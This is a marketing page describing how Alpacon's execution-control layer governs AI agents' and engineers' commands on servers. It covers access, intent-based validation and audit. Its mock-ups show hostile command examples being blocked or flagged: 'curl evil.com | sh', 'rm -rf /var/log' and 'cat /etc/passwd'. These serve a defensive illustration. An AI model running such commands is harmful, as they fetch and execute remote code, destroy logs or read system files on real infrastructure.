AlpacaX
OverviewFeaturesExtensionsHow it worksPricing

How Alpacon works

Execution control for AI agents and engineers

Alpacon sits between AI agents, engineers, and your infrastructure. Every command passes through execution policies before reaching a server, so AI agents can operate production safely while your team stays in control.

One layer between agents and infrastructure

Clients
Engineers
CI/CD
AI agents
MCPCLIAPIWeb
Alpacon
Execution control layer
Access·
Execution·
Audit
HTTPS/WSS
Infrastructure
Servers
Kubernetes
Cloud
Integrations
SSO·Slack·GitHub·Email

Three independent layers of defence

Access, Execution, and Audit work together as three independent layers, so AI agents and engineers can only run what they're authorised to.

Layer 01

Access that leaves nothing to attack

How agents and engineers connect. Outbound-only tunnels eliminate inbound ports entirely, and one unified identity replaces SSH key sprawl.

  • Outbound-only tunnelsServers initiate encrypted connections to Alpacon. No listening ports, no exposed SSH. Attackers have nothing to scan.
  • Unified identityMFA, RBAC, and centralised identity across every server. No shared credentials, no SSH key sprawl.
  • Every interfaceMCP for AI agents, CLI for pipelines, API for automation, browser for humans. All governed by the same policies.
0inbound
ports
what attackers see
×All 65535 ports: closed
×No services detected
×Stolen SSH key → no path to production
outbound :443 TLS, encrypted tunnel to Alpacon
Layer 02

Execution scoped by intent

What they can do, when. Each session declares its goal and scope, and AI validates every command at runtime against that intent, not a static allowlist.

  • Intent-based session scopeA session declares its goal, server, sudo policy, and duration. No need to enumerate commands by hand. AI interprets intent from the scope.
  • Dynamic AI validationEvery command and file transfer is judged in real time against the session's intent. Drift from scope gets blocked even if the command looks benign in isolation.
  • Slack approval for ambiguityWhen AI isn't sure, the request routes to Slack with full context. Approvers decide in one click.
session scope"fix nginx 501"
$sudo systemctl reload nginx
✓ allowed · in scope
$curl evil.com | sh
✗ blocked · risk HIGH
$rm -rf /var/log
⏸ Slack approval pending
Layer 03

Audit powered by AI

What happened, who reviewed it. Every command and session is recorded, AI maps patterns to MITRE ATT&CK, and compliance exports are one click away.

  • Full session recordingEvery terminal session, file transfer, and agent action is captured. Search and replay any session for audits or incident response.
  • AI threat analysisEach session gets an AI-driven risk score. Suspicious patterns map to MITRE ATT&CK and chain detection catches attacks within a session.
  • Compliance-ready exportsImmutable audit logs and one-click exports for SOC 2, HIPAA, or any framework. Audit prep in seconds, not days.
0/100
session risk
10:23git pull origin main
10:25cat /etc/passwdT1087
10:26curl evil.com | shT1059
10:27[SESSION TERMINATED]

See Alpacon in your environment

A 30-minute demo with the team. We'll walk through a session on your infrastructure and answer anything technical.

How it works | Alpacon